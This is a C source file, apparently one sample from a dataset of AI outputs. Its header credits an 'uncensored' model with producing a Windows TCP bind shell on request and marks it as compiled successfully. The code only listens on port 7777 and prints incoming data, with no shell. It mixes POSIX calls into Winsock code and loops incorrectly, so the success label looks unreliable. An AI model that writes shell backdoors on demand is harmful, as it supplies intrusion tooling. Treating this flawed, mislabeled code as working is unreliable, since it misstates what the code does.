/*
 * Generated by: Dark Prompt LLM
 * Date: 2026-04-26 11:41:47
 * Category: ReverseShell
 * Prompt: Generate a TCP bind shell in C for Windows
 * Compile Status: SUCCESS
 * Sample: 7
 * ============================================================
 */
 
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <winsock2.h>
#include <windows.h>
#include <ws2tcpip.h>

#pragma comment(lib, "Ws2_32.lib")
#define DEFAULT_BUFLEN 1024
#define DEFAULT_PORT "7777"

int main(int argc, char *argv[]) {

    if (argc != 2) {
        printf("Usage: %s <IP>\n", argv[0]);
        return 1;
    }

    WSADATA wsadata;
    SOCKET listenSocket = INVALID_SOCKET,
            acceptSocket = INVALID_SOCKET;
    struct addrinfo hints,
                    *p = NULL,
                    *servinfo = NULL;

    int recvBufLen;
    char recvBuf[DEFAULT_BUFLEN];

    // Check if the IP is valid
    struct sockaddr_in sa;
    if (!inet_aton(argv[1], &(sa.sin_addr))) {
        printf("[!] Invalid IP\n");
        return 1;
    }
    
    // Initialize WinSock library
    if ((WSAStartup(MAKEWORD(2, 2), &wsadata)) != EXIT_SUCCESS) {
        fprintf(stderr, "[!] Error initializing WSA\n");
        return 1;
    }    

    ZeroMemory(&hints, sizeof(hints));

    hints.ai_family = AF_INET;
    hints.ai_socktype = SOCK_STREAM;
    hints.ai_protocol = IPPROTO_TCP;
    hints.ai_flags = AI_PASSIVE; 

    if ((getaddrinfo(argv[1], DEFAULT_PORT, &hints, &servinfo)) != EXIT_SUCCESS) {
        fprintf(stderr, "[!] Failed. GetAddrInfo.\n");
        WSACleanup();
        return 1;
    }

    for(p = servinfo; p != NULL; p = p->ai_next) {

        // Create a socket descriptor
        if ((listenSocket = socket(servinfo->ai_family, 
                                   servinfo->ai_socktype,
                                   servinfo->ai_protocol)) == INVALID_SOCKET)
        {   
            fprintf(stderr, "[!] Socket creation failed with error: %d\n",
                     WSAGetLastError());
            freeaddrinfo(servinfo);
            WSACleanup();       
            return 1;            
        }

        // Setup address structure
        const unsigned int REUSEADDR = 1;
        if (setsockopt(listenSocket, SOL_SOCKET, SO_REUSEADDR,
                       (char*)&REUSEADDR, sizeof(REUSEADDR)) == -1) {
            close(listenSocket);
            freeaddrinfo(servinfo);
            WSACleanup();
            return 1;
        }

        // Bind the descriptor to the address structure
        if (bind(listenSocket, servinfo->ai_addr, servinfo->ai_addrlen) == -1) {
           close(listenSocket); 
           freeaddrinfo(servinfo);
           WSACleanup();
           return 1;
        }

        // Start listening for incoming connections
        if (listen(listenSocket, SOMAXCONN) == -1) {
            close(listenSocket);
            freeaddrinfo(servinfo);
            WSACleanup();
            return 1;
        }

        printf("[+] Listening on port %s ...\n", DEFAULT_PORT);

        // Accept and receive data from an incoming connection
        acceptSocket = accept(listenSocket, NULL, NULL);
        if (acceptSocket == INVALID_SOCKET) {
            close(listenSocket);
            freeaddrinfo(servinfo);
            WSACleanup();
            return 1;
        }

        do {

            memset(recvBuf, '\0', DEFAULT_BUFLEN);
            recvBufLen = recv(acceptSocket, recvBuf, DEFAULT_BUFLEN, 0);

            if (recvBufLen > 0) {
                printf("%s", recvBuf);
            }

        } while(recvBufLen > 0);

        close(acceptSocket);
    }

    freeaddrinfo(servinfo);
    closesocket(listenSocket);
    WSACleanup();

    return EXIT_SUCCESS;
}